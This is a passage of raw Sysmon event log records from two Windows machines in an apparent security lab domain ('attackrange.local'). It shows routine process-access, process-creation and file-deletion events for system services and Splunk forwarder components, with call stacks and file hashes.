16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246022Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-521E-6063-BB22-00000000AF01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246021Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-521E-6063-BB22-00000000AF01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246020Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.958{CB4067E1-521E-6063-BB22-00000000AF01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000246019Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.395{CB4067E1-521E-6063-BA22-00000000AF01}23042748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246018Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-521E-6063-BA22-00000000AF01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246017Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246016Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246015Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246014Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246013Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246012Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246011Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246010Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246009Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246008Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-521E-6063-BA22-00000000AF01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246007Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.285{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-521E-6063-BA22-00000000AF01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246006Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.286{CB4067E1-521E-6063-BA22-00000000AF01}2304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246005Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.082{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69F96CBE9CB8EDB18FFB6D831CB01216,SHA256=5FAC1628736F5E84F23D686B099398902772FF8162B891071DC37795CA2A32A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246004Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.082{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93F180931DF1E9E35EE30B173C2562EF,SHA256=AEF410A79BEE904D3B4AF088DEE2D629282C8A108137FE46092742F1D611F9E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061326Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.959{7F8C56E7-521F-6063-2A01-00000000AF01}56644892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061325Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.834{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-521F-6063-2A01-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061324Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.834{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061323Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.834{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061322Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.834{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061321Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.834{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061320Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.834{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-521F-6063-2A01-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061319Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.834{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-521F-6063-2A01-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061318Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.836{7F8C56E7-521F-6063-2A01-00000000AF01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 